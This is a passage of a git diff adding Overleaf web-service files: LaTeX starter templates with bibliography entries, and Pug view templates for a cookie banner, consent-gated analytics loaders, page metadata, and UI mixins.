document. Use the figure environment and the caption command to add a number and a caption to your figure. See the code for Figure \ref{fig:frog} in this section for an example. + +Note that your figure will automatically be placed in the most appropriate place for it, given the surrounding text and taking into account other figures or tables that may be close by. You can find out more about adding images to your documents in this help article on \href{https://www.overleaf.com/learn/how-to/Including_images_on_Overleaf}{including images on Overleaf}. + +\begin{figure} +\centering +\includegraphics[width=0.25\linewidth]{frog.jpg} +\caption{\label{fig:frog}This frog was uploaded via the file-tree menu.} +\end{figure} + +\subsection{How to add Tables} + +Use the table and tabular environments for basic tables --- see Table~\ref{tab:widgets}, for example. For more information, please see this help article on \href{https://www.overleaf.com/learn/latex/tables}{tables}. + +\begin{table} +\centering +\begin{tabular}{l|r} +Item & Quantity \\\hline +Widgets & 42 \\ +Gadgets & 13 +\end{tabular} +\caption{\label{tab:widgets}An example table.} +\end{table} + +\subsection{How to add Comments and Track Changes} + +Comments can be added to your project by highlighting some text and clicking ``Add comment'' in the top right of the editor pane. To view existing comments, click on the Review menu in the toolbar above. To reply to a comment, click on the Reply button in the lower right corner of the comment. You can close the Review pane by clicking its name on the toolbar when you're done reviewing for the time being. + +Track changes are available on all our \href{https://www.overleaf.com/user/subscription/plans}{premium plans}, and can be toggled on or off using the option at the top of the Review pane. Track changes allow you to keep track of every change made to the document, along with the person making the change. + +\subsection{How to add Lists} + +You can make lists with automatic numbering \dots + +\begin{enumerate} +\item Like this, +\item and like this. +\end{enumerate} +\dots or bullet points \dots +\begin{itemize} +\item Like this, +\item and like this. +\end{itemize} + +\subsection{How to write Mathematics} + +\LaTeX{} is great at typesetting mathematics. Let $X_1, X_2, \ldots, X_n$ be a sequence of independent and identically distributed random variables with $\text{E}[X_i] = \mu$ and $\text{Var}[X_i] = \sigma^2 < \infty$, and let +\[S_n = \frac{X_1 + X_2 + \cdots + X_n}{n} + = \frac{1}{n}\sum_{i}^{n} X_i\] +denote their mean. Then as $n$ approaches infinity, the random variables $\sqrt{n}(S_n - \mu)$ converge in distribution to a normal $\mathcal{N}(0, \sigma^2)$. + + +\subsection{How to change the margins and paper size} + +Usually the template you're using will have the page margins and paper size set correctly for that use-case. For example, if you're using a journal article template provided by the journal publisher, that template will be formatted according to their requirements. In these cases, it's best not to alter the margins directly. + +If however you're using a more general template, such as this one, and would like to alter the margins, a common way to do so is via the geometry package. You can find the geometry package loaded in the preamble at the top of this example file, and if you'd like to learn more about how to adjust the settings, please visit this help article on \href{https://www.overleaf.com/learn/latex/page_size_and_margins}{page size and margins}. + +\subsection{How to change the document language and spell check settings} + +Overleaf supports many different languages, including multiple different languages within one document. + +To configure the document language, simply edit the option provided to the babel package in the preamble at the top of this example project. To learn more about the different options, please visit this help article on \href{https://www.overleaf.com/learn/latex/International_language_support}{international language support}. + +To change the spell check language, simply open the Overleaf menu at the top left of the editor window, scroll down to the spell check setting, and adjust accordingly. + +\subsection{How to add Citations and a References List} + +You can simply upload a \verb|.bib| file containing your BibTeX entries, created with a tool such as JabRef. You can then cite entries from it, like this: \cite{greenwade93}. Just remember to specify a bibliography style, as well as the filename of the \verb|.bib|. You can find a \href{https://www.overleaf.com/help/97-how-to-include-a-bibliography-using-bibtex}{video tutorial here} to learn more about BibTeX. + +If you have an \href{https://www.overleaf.com/user/subscription/plans}{upgraded account}, you can also import your Mendeley or Zotero library directly as a \verb|.bib| file, via the upload menu in the file-tree. + +\subsection{Good luck!} + +We hope you find Overleaf useful, and do take a look at our \href{https://www.overleaf.com/learn}{help library} for more tutorials and user guides! Please also let us know if you have any feedback using the Contact Us link at the bottom of the Overleaf menu --- or use the contact form at \url{https://www.overleaf.com/contact}. + +\bibliographystyle{alpha} +\bibliography{sample} + +\end{document} \ No newline at end of file diff --git a/services/web/app/templates/project_files/example-project/sample.bib b/services/web/app/templates/project_files/example-project/sample.bib new file mode 100644 index 0000000..a0e21c7 --- /dev/null +++ b/services/web/app/templates/project_files/example-project/sample.bib @@ -0,0 +1,9 @@ +@article{greenwade93, + author = "George D. Greenwade", + title = "The {C}omprehensive {T}ex {A}rchive {N}etwork ({CTAN})", + year = "1993", + journal = "TUGBoat", + volume = "14", + number = "3", + pages = "342--351" +} diff --git a/services/web/app/templates/project_files/main.tex b/services/web/app/templates/project_files/main.tex new file mode 100644 index 0000000..0d6646a --- /dev/null +++ b/services/web/app/templates/project_files/main.tex @@ -0,0 +1,30 @@ +\documentclass{article} + +\title{<%= project_name %>} +\author{<%= user.first_name %> <%= user.last_name %>} +\date{<%= month %> <%= year %>} + +\usepackage{natbib} +\usepackage{graphicx} + +\begin{document} + +\maketitle + +\section{Introduction} +There is a theory which states that if ever anyone discovers exactly what the Universe is for and why it is here, it will instantly disappear and be replaced by something even more bizarre and inexplicable. +There is another theory which states that this has already happened. + +\begin{figure}[h!] +\centering +\includegraphics[scale=1.7]{universe} +\caption{The Universe} +\label{fig:universe} +\end{figure} + +\section{Conclusion} +``I always thought something was fundamentally wrong with the universe'' \citep{adams1995hitchhiker} + +\bibliographystyle{plain} +\bibliography{references} +\end{document} diff --git a/services/web/app/templates/project_files/mainbasic.tex b/services/web/app/templates/project_files/mainbasic.tex new file mode 100644 index 0000000..aa025f2 --- /dev/null +++ b/services/web/app/templates/project_files/mainbasic.tex @@ -0,0 +1,14 @@ +\documentclass{article} +\usepackage{graphicx} % Required for inserting images + +\title{<%= project_name %>} +\author{<%= user.first_name %> <%= user.last_name %>} +\date{<%= month %> <%= year %>} + +\begin{document} + +\maketitle + +\section{Introduction} + +\end{document} diff --git a/services/web/app/templates/project_files/references.bib b/services/web/app/templates/project_files/references.bib new file mode 100644 index 0000000..1758b10 --- /dev/null +++ b/services/web/app/templates/project_files/references.bib @@ -0,0 +1,8 @@ +@book{adams1995hitchhiker, + title={The Hitchhiker's Guide to the Galaxy}, + author={Adams, D.}, + isbn={9781417642595}, + url={http://books.google.com/books?id=W-xMPgAACAAJ}, + year={1995}, + publisher={San Val} +} diff --git a/services/web/app/templates/project_files/universe.jpg b/services/web/app/templates/project_files/universe.jpg new file mode 100644 index 0000000..ed19e7d Binary files /dev/null and b/services/web/app/templates/project_files/universe.jpg differ diff --git a/services/web/app/views/_cookie_banner.pug b/services/web/app/views/_cookie_banner.pug new file mode 100644 index 0000000..a164e48 --- /dev/null +++ b/services/web/app/views/_cookie_banner.pug @@ -0,0 +1,5 @@ +.cookie-banner.hidden-print.hidden + .cookie-banner-content We only use cookies for essential purposes and to improve your experience on our site. You can find out more in our <a href="/legal#Cookies">cookie policy</a>. + .cookie-banner-actions + button(type="button" class="btn btn-link btn-sm" data-ol-cookie-banner-set-consent="essential") Essential cookies only + button(type="button" class="btn btn-primary btn-sm" data-ol-cookie-banner-set-consent="all") Accept all cookies \ No newline at end of file diff --git a/services/web/app/views/_customer_io.pug b/services/web/app/views/_customer_io.pug new file mode 100644 index 0000000..81d75f7 --- /dev/null +++ b/services/web/app/views/_customer_io.pug @@ -0,0 +1,26 @@ +if(customerIoEnabled && ExposedSettings.cioWriteKey && ExposedSettings.cioSiteId) + script(type="text/javascript", id="cio-loader", nonce=scriptNonce, data-cio-write-key=ExposedSettings.cioWriteKey, data-cio-site-id=ExposedSettings.cioSiteId, data-session-analytics-id=getSessionAnalyticsId(), data-user-id=getLoggedInUserId()). + var cioSettings = document.querySelector('#cio-loader').dataset; + var analyticsId = cioSettings.sessionAnalyticsId; + var siteId = cioSettings.cioSiteId; + var writeKey = cioSettings.cioWriteKey; + var userId = cioSettings.userId; + + !function(){var i="cioanalytics", analytics=(window[i]=window[i]||[]);if(!analytics.initialize)if(analytics.invoked)window.console&&console.error&&console.error("Snippet included twice.");else{analytics.invoked=!0;analytics.methods=["trackSubmit","trackClick","trackLink","trackForm","pageview","identify","reset","group","track","ready","alias","debug","page","once","off","on","addSourceMiddleware","addIntegrationMiddleware","setAnonymousId","addDestinationMiddleware"];analytics.factory=function(e){return function(){var t=Array.prototype.slice.call(arguments);t.unshift(e);analytics.push(t);return analytics}};for(var e=0;e<analytics.methods.length;e++){var key=analytics.methods[e];analytics[key]=analytics.factory(key)}analytics.load=function(key,e){var t=document.createElement("script");t.type="text/javascript";t.async=!0;t.setAttribute('data-global-customerio-analytics-key', i);t.src="https://cdp.customer.io/v1/analytics-js/snippet/" + key + "/analytics.min.js";var n=document.getElementsByTagName("script")[0];n.parentNode.insertBefore(t,n);analytics._writeKey=key;analytics._loadOptions=e};analytics.SNIPPET_VERSION="4.15.3"; + analytics.load( + writeKey, + { + disableClientPersistence: true, + "integrations": { + "Customer.io In-App Plugin": { + siteId + } + } + } + ); + if (analyticsId) { + analytics.setAnonymousId(analyticsId); + }; + // If userId is undefined, identify sends only the anonymousId (aka analyticsId) + analytics.identify(userId); + }}(); diff --git a/services/web/app/views/_google_analytics.pug b/services/web/app/views/_google_analytics.pug new file mode 100644 index 0000000..56cc291 --- /dev/null +++ b/services/web/app/views/_google_analytics.pug @@ -0,0 +1,58 @@ +if (typeof(ExposedSettings.gaTokenV4) != "undefined" || typeof(ExposedSettings.gaToken) != "undefined") + script(type="text/javascript", nonce=scriptNonce, id="ga-loader" data-ga-token=ExposedSettings.gaToken data-ga-token-v4=ExposedSettings.gaTokenV4 data-cookie-domain=ExposedSettings.cookieDomain data-session-analytics-id=getSessionAnalyticsId()). + var gaSettings = document.querySelector('#ga-loader').dataset; + var gaid = gaSettings.gaTokenV4; + var gaToken = gaSettings.gaToken; + var cookieDomain = gaSettings.cookieDomain; + var sessionAnalyticsId = gaSettings.sessionAnalyticsId; + if(gaid) { + var additionalGaConfig = sessionAnalyticsId ? { 'user_id': sessionAnalyticsId } : {}; + window.dataLayer = window.dataLayer || []; + function gtag(){ + dataLayer.push(arguments); + } + gtag('js', new Date()); + gtag('config', gaid, { 'anonymize_ip': true, ...additionalGaConfig }); + } + if (gaToken) { + window.ga = window.ga || function () { + (window.ga.q = window.ga.q || []).push(arguments); + }, window.ga.l = 1 * new Date(); + } + var loadGA = window.olLoadGA = function() { + if (gaid) { + var s = document.createElement('script'); + s.setAttribute('async', 'async'); + s.setAttribute('src', 'https://www.googletagmanager.com/gtag/js?id=' + gaid); + document.querySelector('head').append(s); + } + if (gaToken) { + (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ + (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), + m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) + })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); + ga('create', gaToken, cookieDomain.replace(/^\./, "")); + ga('set', 'anonymizeIp', true); + if (sessionAnalyticsId) { + ga('set', 'userId', sessionAnalyticsId); + } + ga('send', 'pageview'); + } + }; + // Check if consent given (features/cookie-banner) + var oaCookie = document.cookie.split('; ').find(function(cookie) { + return cookie.startsWith('oa='); + }); + if(oaCookie) { + var oaCookieValue = oaCookie.split('=')[1]; + if(oaCookieValue === '1') { + loadGA(); + } + } + +if typeof(ExposedSettings.gaTokenV4) === "undefined" + script(type="text/javascript", nonce=scriptNonce). + window.gtag = function() { console.log("would send to GA4", arguments) }; +if typeof(ExposedSettings.gaToken) === "undefined" + script(type="text/javascript", nonce=scriptNonce). + window.ga = function() { console.log("would send to GA", arguments) }; diff --git a/services/web/app/views/_metadata.pug b/services/web/app/views/_metadata.pug new file mode 100644 index 0000000..a784860 --- /dev/null +++ b/services/web/app/views/_metadata.pug @@ -0,0 +1,123 @@ + +//- Title +if (metadata && metadata.title) + title= metadata.title + ' - ' + settings.appName + ', ' + translate("online_latex_editor") + meta(name="twitter:title", content=metadata.title) + meta(name="og:title", content=metadata.title) +else if (typeof(title) == "undefined") + title= settings.appName + ', '+ translate("online_latex_editor") + meta(name="twitter:title", content=settings.appName + ', '+ translate("online_latex_editor")) + meta(name="og:title", content=settings.appName + ', '+ translate("online_latex_editor")) +else + title= translate(title) + ' - ' + settings.appName + ', ' + translate("online_latex_editor") + //- to do - not translate? + meta(name="twitter:title", content=translate(title)) + meta(name="og:title", content=translate(title)) + +//- Description +if (metadata && metadata.description) + meta(name="description" , content=metadata.description) + meta(itemprop="description" , content=metadata.description) + //-twitter and og descriptions handeled in their sections below +else + meta(name="description", content=translate("site_description")) + meta(itemprop="description", content=translate("site_description")) + +//- Image +if (metadata && metadata.image && metadata.image.fields) + //- from the CMS + meta(itemprop="image", content=metadata.image.fields.file.url) + meta(name="image", content=metadata.image.fields.file.url) +else if (metadata && metadata.image_src) + //- pages with custom metadata images, metadata.image_src is the full image URL + meta(itemprop="image", content=metadata.image_src) + meta(name="image", content=metadata.image_src) +else if (settings.overleaf) + //- the default image for Overleaf + meta(itemprop="image", content=buildImgPath('ol-brand/overleaf_og_logo.png')) + meta(name="image", content=buildImgPath('ol-brand/overleaf_og_logo.png')) +else + //- the default image for Overleaf Community Edition/Server Pro + meta(itemprop="image", content='/apple-touch-icon.png') + meta(name="image", content='/apple-touch-icon.png') + +//- Keywords +if (metadata && metadata.keywords) + meta(name="keywords" content=metadata.keywords) + +//- Misc +meta(itemprop="name", content=settings.appName + ", the Online LaTeX Editor") + +if (metadata && metadata.robotsNoindexNofollow) + meta(name="robots" content="noindex, nofollow") + +//- Twitter +meta(name="twitter:card", content=metadata && metadata.twitterCardType ? metadata.twitterCardType : 'summary') +if (settings.social && settings.social.twitter && settings.social.twitter.handle) + meta(name="twitter:site", content="@" + settings.social.twitter.handle) +if (metadata && metadata.twitterDescription) + meta(name="twitter:description", content=metadata.twitterDescription) +else + meta(name="twitter:description", content=translate("site_description")) +if (metadata && metadata.twitterImage && metadata.twitterImage.fields) + //- from the CMS + meta(name="twitter:image", content=metadata.twitterImage.fields.file.url) + meta(name="twitter:image:alt", content=metadata.twitterImage.fields.title) +else if (settings.overleaf) + //- the default image for Overleaf + meta(name="twitter:image", content=buildImgPath('ol-brand/overleaf_og_logo.png')) +else + //- the default image for Overleaf Community Edition/Server Pro + meta(name="twitter:image", content='/apple-touch-icon.png') + +//- Open Graph +//- to do - add og:url +if (settings.social && settings.social.facebook && settings.social.facebook.appId) + meta(property="fb:app_id", content=settings.social.facebook.appId) + +if (metadata && metadata.openGraphDescription) + meta(property="og:description", content=metadata.openGraphDescription) +else + meta(property="og:description", content=translate("site_description")) + +if (metadata && metadata.openGraphImage && metadata.openGraphImage.fields) + //- from the CMS + meta(property="og:image", content=metadata.openGraphImage.fields.file.url) +else if (settings.overleaf) + //- the default image for Overleaf + meta(property="og:image", content=buildImgPath('ol-brand/overleaf_og_logo.png')) +else + //- the default image for Overleaf Community Edition/Server Pro + meta(property="og:image", content='/apple-touch-icon.png') + +if (metadata && metadata.openGraphType) + meta(property="og:type", metadata.openGraphType) +else + meta(property="og:type", content="website") + +if (metadata && metadata.openGraphVideo) + //- from the CMS + meta(property="og:video", content=metadata.openGraphVideo) + +//- Viewport +if !metadata || metadata.viewport !== false + meta(name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=yes") + +//- Noindex +if settings.robotsNoindex + meta(name="robots" content="noindex") + +//- Icons +link(rel="icon", sizes="32x32", href="/favicon-32x32.png") +link(rel="icon", sizes="16x16", href="/favicon-16x16.png") +link(rel="icon", href="/favicon.svg" type="image/svg+xml") +link(rel="apple-touch-icon", href="/apple-touch-icon.png") +link(rel="mask-icon", href="/mask-favicon.svg", color="#046530") + +//- Canonical Tag for SEO +if (metadata && metadata.canonicalURL) + link(rel="canonical" href=metadata.canonicalURL) + +//- Manifest +//- Does not currently contain a start_url to prevent browser installation prompts +link(rel="manifest" href="/web.sitemanifest") diff --git a/services/web/app/views/_mixins/back_to_btns.pug b/services/web/app/views/_mixins/back_to_btns.pug new file mode 100644 index 0000000..da1c9c0 --- /dev/null +++ b/services/web/app/views/_mixins/back_to_btns.pug @@ -0,0 +1,4 @@ +mixin back-to-btns(settingsAnchor) + a.btn.btn-secondary.text-capitalize(href=`/user/settings${settingsAnchor ? '#' + settingsAnchor : '' }`) #{translate('back_to_account_settings')} + | + a.btn.btn-secondary.text-capitalize(href='/project') #{translate('back_to_your_projects')} \ No newline at end of file diff --git a/services/web/app/views/_mixins/begin_now_card.pug b/services/web/app/views/_mixins/begin_now_card.pug new file mode 100644 index 0000000..8f99195 --- /dev/null +++ b/services/web/app/views/_mixins/begin_now_card.pug @@ -0,0 +1,25 @@ +mixin begin_now_card() + - var registerURL = '/register' + - var plansURL = '/user/subscription/plans' + - var isUserLoggedIn = !!getSessionUser() + + .begin-now-card + div.card.card-pattern + .card-body + p.dm-mono + span.font-size-display-xs + span.text-purple-bright \begin + wbr + span.text-green-bright { + span now + span.text-green-bright } + p #{translate("discover_why_over_people_worldwide_trust_overleaf", {count: settings.userCountInMillions})} + p.card-links + if !isUserLoggedIn + a.btn.btn-primary.card-link( + href=registerURL + ) #{translate("sign_up_for_free")} + a.btn.card-link( + class = isUserLoggedIn ? 'btn-primary' : 'btn-secondary' + href=plansURL + ) #{translate("explore_all_plans")} diff --git a/services/web/app/views/_mixins/bookmarkable_tabset.pug b/services/web/app/views/_mixins/bookmarkable_tabset.pug new file mode 100644 index 0000000..27ac74e --- /dev/null +++ b/services/web/app/views/_mixins/bookmarkable_tabset.pug @@ -0,0 +1,10 @@ +mixin bookmarkable-tabset-header(id, title, active) + li(role="presentation") + a.nav-link( + href='#' + id + class=(active ? 'active' : '') + aria-controls=id + role="tab" + data-toggle="tab" + data-ol-bookmarkable-tab + ) #{title} diff --git a/services/web/app/views/_mixins/bootstrap_js.pug b/services/web/app/views/_mixins/bootstrap_js.pug new file mode 100644 index 0000000..866b0b4 --- /dev/null +++ b/services/web/app/views/_mixins/bootstrap_js.pug @@ -0,0 +1,3 @@ +mixin bootstrap-js(bootstrapVersion) + each file in (entrypointScripts(bootstrapVersion === 5 ? 'bootstrap-5' : 'bootstrap-3')) + script(type="text/javascript", nonce=scriptNonce, src=file) diff --git a/services/web/app/views/_mixins/eyebrow.pug b/services/web/app/views/_mixins/eyebrow.pug new file mode 100644 index 0000000..c5f01a1 --- /dev/null +++ b/services/web/app/views/_mixins/eyebrow.pug @@ -0,0 +1,5 @@ +mixin eyebrow(text) + span.eyebrow-text + span(aria-hidden="true") { + span #{text} + span(aria-hidden="true") } \ No newline at end of file diff --git a/services/web/app/views/_mixins/faq_search-marketing.pug b/services/web/app/views/_mixins/faq_search-marketing.pug new file mode 100644 index 0000000..8ec136e --- /dev/null +++ b/services/web/app/views/_mixins/faq_search-marketing.pug @@ -0,0 +1,30 @@ +mixin faq_search-marketing(headerText, headerClass) + if (typeof(settings.algolia) != "undefined" && typeof(settings.algolia.indexes) != "undefined" && typeof(settings.algolia.indexes.wiki) != "undefined") + if headerText + div(class=headerClass) #{headerText} + .wiki + form.project-search.form-horizontal(role="search" data-ol-faq-search) + .form-group.has-feedback.has-feedback-left + .col-sm-12 + input.form-control(type='text', placeholder="Search help library…") + i.fa.fa-search.form-control-feedback-left(aria-hidden="true") + i.fa.fa-times.form-control-feedback( + style="cursor: pointer;", + hidden + data-ol-clear-search + aria-hidden="true" + ) + button.sr-only( + type="button" + hidden + data-ol-clear-search + aria-label=translate('clear_search') + ) + + .row(role="region" aria-label="search results") + .col-md-12() + div(data-ol-search-results-wrapper) + span.sr-only(aria-live="polite" data-ol-search-sr-help-message) + div(data-ol-search-results) + .row-spaced-small.search-result.card.card-thin(hidden data-ol-search-no-results) + p #{translate("no_search_results")} diff --git a/services/web/app/views/_mixins/foot_scripts.pug b/services/web/app/views/_mixins/foot_scripts.pug new file mode 100644 index 0000000..c6b65e8 --- /dev/null +++ b/services/web/app/views/_mixins/foot_scripts.pug @@ -0,0 +1,6 @@ +mixin foot-scripts() + each file in entrypointScripts(entrypoint) + script(type="text/javascript", nonce=scriptNonce, src=file, defer=deferScripts) + if (settings.devToolbar.enabled) + each file in entrypointScripts("devToolbar") + script(type="text/javascript", nonce=scriptNonce, src=file, defer=deferScripts) diff --git a/services/web/app/views/_mixins/formMessages.pug b/services/web/app/views/_mixins/formMessages.pug new file mode 100644 index 0000000..9ea2392 --- /dev/null +++ b/services/web/app/views/_mixins/formMessages.pug @@ -0,0 +1,91 @@ +mixin formMessages() + div( + data-ol-form-messages='', + role="alert" + ) + +mixin formMessagesNewStyle() + div( + data-ol-form-messages-new-style='', + role="alert" + ) + +mixin customFormMessage(key, kind) + if kind === 'success' + div.alert.alert-success( + hidden, + data-ol-custom-form-message=key, + role="alert" + aria-live="polite" + ) + block + else if kind === 'danger' + div.alert.alert-danger( + hidden, + data-ol-custom-form-message=key, + role="alert" + aria-live="assertive" + ) + block + else + div.alert.alert-warning( + hidden, + data-ol-custom-form-message=key, + role="alert" + aria-live="polite" + ) + block + +mixin customFormMessageNewStyle(key, kind) + if kind === 'success' + div.notification.notification-type-success( + hidden, + data-ol-custom-form-message=key, + role="alert" + aria-live="polite" + ) + div.notification-icon + span.material-symbols(aria-hidden="true") check_circle + div.notification-content.text-left + block + else if kind === 'danger' + div.notification.notification-type-error( + hidden, + data-ol-custom-form-message=key, + role="alert" + aria-live="polite" + ) + div.notification-icon + span.material-symbols(aria-hidden="true") error + div.notification-content.text-left + block + else + div.notification.notification-type-warning( + hidden, + data-ol-custom-form-message=key, + role="alert" + aria-live="polite" + ) + div.notification-icon + span.material-symbols(aria-hidden="true") warning + div.notification-content.text-left + block + +mixin customValidationMessage(key) + div.invalid-feedback.mt-2( + hidden, + data-ol-custom-form-message=key + ) + i.fa.fa-fw.fa-warning.me-1(aria-hidden="true") + div + block + +mixin customValidationMessageNewStyle(key) + div.notification.notification-type-error( + hidden, + data-ol-custom-form-message=key + ) + div.notification-icon + span.material-symbols(aria-hidden="true") error + div.notification-content.text-left.small + block diff --git a/services/web/app/views/_mixins/links.pug b/services/web/app/views/_mixins/links.pug new file mode 100644 index 0000000..9036f86 --- /dev/null +++ b/services/web/app/views/_mixins/links.pug @@ -0,0 +1,123 @@ +mixin linkAdvisors(linkText, linkClass, track) + //- To Do: verify path + - var gaCategory = track && track.category ? track.category : 'All' + - var gaAction = track && track.action ? track.action : null + - var gaLabel = track && track.label ? track.label : null + - var mb = track && track.mb ? 'true' : null + - var mbSegmentation = track && track.segmentation ? track.segmentation : null + - var trigger = track && track.trigger ? track.trigger : null + a(href="/advisors" + class=linkClass ? linkClass : '' + event-tracking-ga=gaCategory + event-tracking=gaAction + event-tracking-label=gaLabel + event-tracking-trigger=trigger + event-tracking-mb=mb + event-segmentation=mbSegmentation + ) + span #{linkText ? linkText : 'advisor programme'} + +mixin linkBenefits(linkText, linkClass) + a(href=(settings.siteUrl ? settings.siteUrl : '') + "/for/authors" class=linkClass ? linkClass : '') + | #{linkText ? linkText : 'benefits'} + +mixin linkBlog(linkText, linkClass, slug) + if slug + a(href=(settings.siteUrl ? settings.siteUrl : '') + "/blog/" + slug class=linkClass ? linkClass : '') + | #{linkText ? linkText : 'blog'} + +mixin linkContact(linkText, linkClass) + a(href=(settings.siteUrl ? settings.siteUrl : '') + "/contact" class=linkClass ? linkClass : '') + | #{linkText ? linkText : 'contact'} + +mixin linkDash(linkText, linkClass) + a(href="/project" class=linkClass ? linkClass : '') + | #{linkText ? linkText : 'project dashboard'} + +mixin linkEducation(linkText, linkClass) + a(href=(settings.siteUrl ? settings.siteUrl : '') + "/for/edu" class=linkClass ? linkClass : '') + | #{linkText ? linkText : 'teaching toolkit'} + +mixin linkInvite(linkText, linkClass, track) + - var gaCategory = track && track.category ? track.category : 'All' + - var gaAction = track && track.action ? track.action : null + - var gaLabel = track && track.label ? track.label : null + - var mb = track && track.mb ? 'true' : null + - var mbSegmentation = track && track.segmentation ? track.segmentation : null + - var trigger = track && track.trigger ? track.trigger : null + + a(href="/user/bonus" + class=linkClass ? linkClass : '' + event-tracking-ga=gaCategory + event-tracking=gaAction + event-tracking-label=gaLabel + event-tracking-trigger=trigger + event-tracking-mb=mb + event-segmentation=mbSegmentation + ) + span #{linkText ? linkText : 'invite your friends'} + +mixin linkPlansAndPricing(linkText, linkClass) + a(href="/user/subscription/plans" class=linkClass ? linkClass : '') + | #{linkText ? linkText : 'plans and pricing'} + +mixin linkPrintNewTab(linkText, linkClass, icon, track) + - var gaCategory = track && track.category ? track.category : null + - var gaAction = track && track.action ? track.action : null + - var gaLabel = track && track.label ? track.label : null + - var mb = track && track.mb ? 'true' : null + - var mbSegmentation = track && track.segmentation ? track.segmentation : null + - var trigger = track && track.trigger ? track.trigger : null + + a(href='?media=print' + class=linkClass ? linkClass : '' + event-tracking-ga=gaCategory + event-tracking=gaAction + event-tracking-label=gaLabel + event-tracking-trigger=trigger + event-tracking-mb=mb + event-segmentation=mbSegmentation + target="_BLANK", + rel="noopener noreferrer" + ) + if icon + i(class="fa fa-print") + |   + span #{linkText ? linkText : 'print'} + +mixin linkSignIn(linkText, linkClass, redirect) + a(href=`/login${redirect ? '?redir=' + redirect : ''}` class=linkClass ? linkClass : '') + | #{linkText ? linkText : 'sign in'} + +mixin linkSignUp(linkText, linkClass, redirect) + a(href=`/register${redirect ? '?redir=' + redirect : ''}` class=linkClass ? linkClass : '') + | #{linkText ? linkText : 'sign up'} + +mixin linkTweet(linkText, linkClass, tweetText, track) + //- twitter-share-button is required by twitter + - var gaCategory = track && track.category ? track.category : 'All' + - var gaAction = track && track.action ? track.action : null + - var gaLabel = track && track.label ? track.label : null + - var mb = track && track.mb ? 'true' : null + - var mbSegmentation = track && track.segmentation ? track.segmentation : null + - var trigger = track && track.trigger ? track.trigger : null + a(class="twitter-share-button " + linkClass + event-tracking-ga=gaCategory + event-tracking=gaAction + event-tracking-label=gaLabel + event-tracking-trigger=trigger + event-tracking-mb=mb + event-segmentation=mbSegmentation + href="https://twitter.com/intent/tweet?text=" + tweetText + target="_BLANK", + rel="noopener noreferrer" + ) #{linkText ? linkText : 'tweet'} + +mixin linkUniversities(linkText, linkClass) + a(href=(settings.siteUrl ? settings.siteUrl : '') + "/for/universities" class=linkClass ? linkClass : '') + | #{linkText ? linkText : 'universities'} + +mixin linkWithArrow({text, href, eventTracking, eventSegmentation, eventTrackingTrigger}) + a.link-with-arrow(href=href event-tracking=eventTracking event-segmentation=eventSegmentation, event-tracking-trigger=eventTrackingTrigger event-tracking-mb) + | #{text} + i.material-symbols(aria-hidden="true") arrow_right_alt diff --git a/services/web/app/views/_mixins/navbar.pug b/services/web/app/views/_mixins/navbar.pug new file mode 100644 index 0000000..f3482d3 --- /dev/null +++ b/services/web/app/views/_mixins/navbar.pug @@ -0,0 +1,23 @@ +mixin nav-item + li(role="none")&attributes(attributes) + block + +mixin nav-link + a(role="menuitem").nav-link&attributes(attributes) + block + +mixin dropdown-menu + ul(role="menu").dropdown-menu&attributes(attributes) + block + +mixin dropdown-menu-item + li(role="none") + block + +mixin dropdown-menu-link-item + +dropdown-menu-item + a(role="menuitem").dropdown-item&attributes(attributes) + block + +mixin dropdown-menu-divider + li(role="separator").dropdown-divider.d-none.d-lg-block diff --git a/services/web/app/views/_mixins/notification.pug b/services/web/app/views/_mixins/notification.pug new file mode 100644 index 0000000..3e336af --- /dev/null +++ b/services/web/app/views/_mixins/notification.pug @@ -0,0 +1,42 @@ +//- to be kept in sync with frontend/js/shared/components/notification.tsx + +mixin notificationIcon(type) + if type === 'info' + span.material-symbols(aria-hidden="true") info + else if type === 'success' + span.material-symbols(aria-hidden="true") check_circle + else if type === 'error' + span.material-symbols(aria-hidden="true") error + else if type === 'warning' + span.material-symbols(aria-hidden="true") warning + + +mixin notification(options) + - var {ariaLive, id, type, title, content, disclaimer, className} = options + - var classNames = `notification notification-type-${type} ${className ? className : ''} ${isActionBelowContent ? 'notification-cta-below-content' : ''}` + + div( + aria-live=ariaLive, + role="alert", + id=id, + class=classNames + ) + .notification-icon + +notificationIcon(type) + .notification-content-and-cta + .notification-content + if title + p + b #{title} + | !{content} + //- TODO: handle action + //- if action + //- .notification-cta + if disclaimer + .notification-disclaimer #{disclaimer} + //- TODO: handle dismissible notifications + //- TODO: handle onDismiss + //- if isDismissible + //- .notification-close-btn + //- button(aria-label=translate('close')) + //- span.material-symbols(aria-hidden="true") close diff --git a/services/web/app/views/_mixins/pagination.pug b/services/web/app/views/_mixins/pagination.pug new file mode 100644 index 0000000..ef5f62b --- /dev/null +++ b/services/web/app/views/_mixins/pagination.pug @@ -0,0 +1,86 @@ +mixin pagination(pages, page_path, max_btns) + //- @param pages.current_page the current page viewed + //- @param pages.total_pages previously calculated, + //- based on total entries and entries per page + //- @param page_path the relative path, minus a trailing slash and page param + //- @param max_btns max number of buttons on either side of the current page + //- button and excludes first, prev, next, last + + if pages && pages.current_page && pages.total_pages && pages.total_pages > 1 + - var max_btns = max_btns || 4 + - var prev_page = Math.max(parseInt(pages.current_page, 10) - max_btns, 1) + - var next_page = parseInt(pages.current_page, 10) + 1 + - var next_index = 0; + - var full_page_path = page_path + "/page/" + + nav(role="navigation" aria-label=(translate("pagination_navigation"))) + ul.pagination + if pages.current_page > 1 + li + a( + aria-label=translate("go_to_first_page") + href=page_path + ) + span(aria-hidden="true") << + | + | First + li + a( + aria-label=translate("go_to_previous_page") + href=full_page_path + (parseInt(pages.current_page, 10) - 1) + rel="prev" + ) + span(aria-hidden="true") < + | + | Prev + + if pages.current_page - max_btns > 1 + li(aria-hidden="true") + span … + + while prev_page < pages.current_page + li + a( + aria-label=translate("go_to_page_x", {page: prev_page}) + href=full_page_path + prev_page + ) #{prev_page} + - prev_page++ + + li(class="active") + span( + aria-label=translate("current_page_page", {page: pages.current_page}) + aria-current="true" + ) #{pages.current_page} + + if pages.current_page < pages.total_pages + while next_page <= pages.total_pages && next_index < max_btns + li + a( + aria-label=translate("go_to_page_x", {page: next_page}) + href=full_page_path + next_page + ) #{next_page} + - next_page++ + - next_index++ + + if next_page <= pages.total_pages + li.ellipses(aria-hidden="true") + 